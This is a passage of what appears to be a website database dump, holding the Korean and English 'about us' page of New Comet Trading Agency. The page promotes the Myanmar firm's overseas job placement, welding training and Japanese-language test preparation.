lang=\"KO\">구매 판매하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> \"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧 해외 직업 소개회사</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 192, 'en', 0, '<p>&nbsp;<span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\" 